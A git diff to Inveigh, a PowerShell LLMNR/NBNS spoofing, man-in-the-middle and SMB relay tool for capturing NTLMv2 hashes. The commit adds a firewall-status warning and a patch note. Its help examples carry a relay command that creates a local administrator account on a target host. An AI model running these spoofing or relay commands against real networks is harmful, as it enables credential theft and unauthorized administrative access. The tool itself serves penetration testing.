diff options
| -rw-r--r-- | README.md | 7 | ||||
| -rw-r--r-- | Scripts/Inveigh-BruteForce.ps1 | 13 | ||||
| -rw-r--r-- | Scripts/Inveigh-Relay.ps1 | 15 | ||||
| -rw-r--r-- | Scripts/Inveigh.ps1 | 16 |
4 files changed, 47 insertions, 4 deletions
@@ -73,7 +73,7 @@ Inveigh is a Windows PowerShell LLMNR/NBNS spoofer/man-in-the-middle tool design * __Tool__ - Default = 0: (0,1,2) Enable/Disable features for better operation through external tools such as Metasploit's Interactive Powershell Sessions and Empire. 0 = None, 1 = Metasploit, 2 = Empire ### Invoke-InveighBruteForce -* The remote (Hot Potato method)/unprivileged NBNS brute force spoofer function. This function can be used to perform NBNS spoofing across subnets and/or perform NBNS spoofing without an elevated administrator or SYSTEM shell. +* The remote (Hot Potato method)/unprivileged NBNS brute force spoofer function. This function can be used to perform NBNS spoofing across subnets and/or perform NBNS spoofing without an elevated administrator or SYSTEM shell. ##### Privilege Requirements: * Regular User @@ -84,6 +84,9 @@ Inveigh is a Windows PowerShell LLMNR/NBNS spoofer/man-in-the-middle tool design * Granular control of console and file output * Run time control +##### Notes: +* Microsoft released patches in June 2016 that will likely prevent some of this function's features from working. + ##### Parameters: * __SpooferIP__ - Specify an IP address for NBNS spoofing. This parameter is only necessary when redirecting victims to a system other than the Inveigh Brute Force host. * __SpooferTarget__ - Specify an IP address to target for brute force NBNS spoofing. @@ -156,7 +159,7 @@ Inveigh is a Windows PowerShell LLMNR/NBNS spoofer/man-in-the-middle tool design * __Get-InveighNTLMv2__ - Get all or unique (-unique) captured NTLMv2 challenge/response hashes * __Watch-Inveigh__ - Enable real time console output * __Clear-Inveigh__ - Clear Inveigh data from memory -* __Stop-Inveigh__ - Stop all running Inveigh functions +* __Stop-Inveigh__ - Stop all running Inveigh functions ## Miscellaneous Notes * The local LLMNR/NBNS services do not need to be disabled on the host system. diff --git a/Scripts/Inveigh-BruteForce.ps1 b/Scripts/Inveigh-BruteForce.ps1 index 5bdc181..2fa6cfd 100644 --- a/Scripts/Inveigh-BruteForce.ps1 +++ b/Scripts/Inveigh-BruteForce.ps1 @@ -285,6 +285,13 @@ else $inveigh.status_queue.Add("Inveigh Brute Force started at $(Get-Date -format 's')") > $null $inveigh.log.Add($inveigh.log_file_queue[$inveigh.log_file_queue.Add("$(Get-Date -format 's') - Inveigh Brute Force started")]) > $null +$firewall_status = netsh advfirewall show allprofiles state | where {$_ -match 'ON'} + +if($firewall_status) +{ + $inveigh.status_queue.Add("Windows Firewall = Enabled") > $null +} + if($NBNS -eq 'Y') { $inveigh.status_queue.Add("NBNS Brute Force Spoofer Target = $SpooferTarget") > $null @@ -445,6 +452,12 @@ if($inveigh.status_output) $inveigh.status_queue.RemoveRange(0,1) } + "Windows Firewall = Enabled" + { + Write-Warning($inveigh.status_queue[0]) + $inveigh.status_queue.RemoveRange(0,1) + } + default { Write-Output($inveigh.status_queue[0]) diff --git a/Scripts/Inveigh-Relay.ps1 b/Scripts/Inveigh-Relay.ps1 index 70551b2..f8ce03e 100644 --- a/Scripts/Inveigh-Relay.ps1 +++ b/Scripts/Inveigh-Relay.ps1 @@ -87,7 +87,7 @@ Default = 0: (0,1,2) Enable/Disable features for better operation through extern Interactive Powershell Sessions and Empire. 0 = None, 1 = Metasploit, 2 = Empire .EXAMPLE -Invoke-InveighRelay -SMBRelayTarget 192.168.2.55 -SMBRelayCommand "net user Dave Spring2016 /add && net localgroup administrators Dave /add" +Invoke-InveighRelay -SMBRelayTarget 192.168.2.55 -SMBRelayCommand "net user Dave Summer2016 /add && net localgroup administrators Dave /add" Execute with SMB relay enabled with a command that will create a local administrator account on the SMB relay target. @@ -234,6 +234,13 @@ if(!$inveigh.running) $inveigh.status_queue.Add("Inveigh Relay started at $(Get-Date -format 's')") > $null $inveigh.log.Add($inveigh.log_file_queue[$inveigh.log_file_queue.Add("$(Get-Date -format 's') - Inveigh Relay started")]) > $null + $firewall_status = netsh advfirewall show allprofiles state | where {$_ -match 'ON'} + + if($firewall_status) + { + $inveigh.status_queue.Add("Windows Firewall = Enabled") > $null + } + if($HTTP -eq 'Y') { $inveigh.HTTP = $true @@ -402,6 +409,12 @@ if($inveigh.status_output) $inveigh.status_queue.RemoveRange(0,1) } + "Windows Firewall = Enabled" + { + Write-Warning($inveigh.status_queue[0]) + $inveigh.status_queue.RemoveRange(0,1) + } + default { Write-Output($inveigh.status_queue[0]) diff --git a/Scripts/Inveigh.ps1 b/Scripts/Inveigh.ps1 index da0cf55..1e5ea3f 100644 --- a/Scripts/Inveigh.ps1 +++ b/Scripts/Inveigh.ps1 @@ -223,7 +223,7 @@ Invoke-Inveigh -HTTPResponse "<html><head><meta http-equiv='refresh' content='0; Execute specifying an HTTP redirect response. .EXAMPLE -Invoke-Inveigh -SMBRelay y -SMBRelayTarget 192.168.2.55 -SMBRelayCommand "net user Dave Spring2016 /add && net localgroup administrators Dave /add" +Invoke-Inveigh -SMBRelay y -SMBRelayTarget 192.168.2.55 -SMBRelayCommand "net user Dave Summer2016 /add && net localgroup administrators Dave /add" Execute with SMB relay enabled with a command that will create a local administrator account on the SMB relay target. @@ -478,6 +478,14 @@ else # Write startup messages $inveigh.status_queue.Add("Inveigh started at $(Get-Date -format 's')") > $null $inveigh.log.Add($inveigh.log_file_queue[$inveigh.log_file_queue.Add("$(Get-Date -format 's') - Inveigh started")]) > $null + +$firewall_status = netsh advfirewall show allprofiles state | where {$_ -match 'ON'} + +if($firewall_status) +{ + $inveigh.status_queue.Add("Windows Firewall = Enabled") > $null +} + $inveigh.status_queue.Add("Listening IP Address = $IP") > $null $inveigh.status_queue.Add("LLMNR/NBNS Spoofer IP Address = $SpooferIP") > $null @@ -785,6 +793,12 @@ if($SMBRelay -eq 'N') $inveigh.status_queue.RemoveRange(0,1) } + "Windows Firewall = Enabled" + { + Write-Warning($inveigh.status_queue[0]) + $inveigh.status_queue.RemoveRange(0,1) + } + default { Write-Output($inveigh.status_queue[0]) |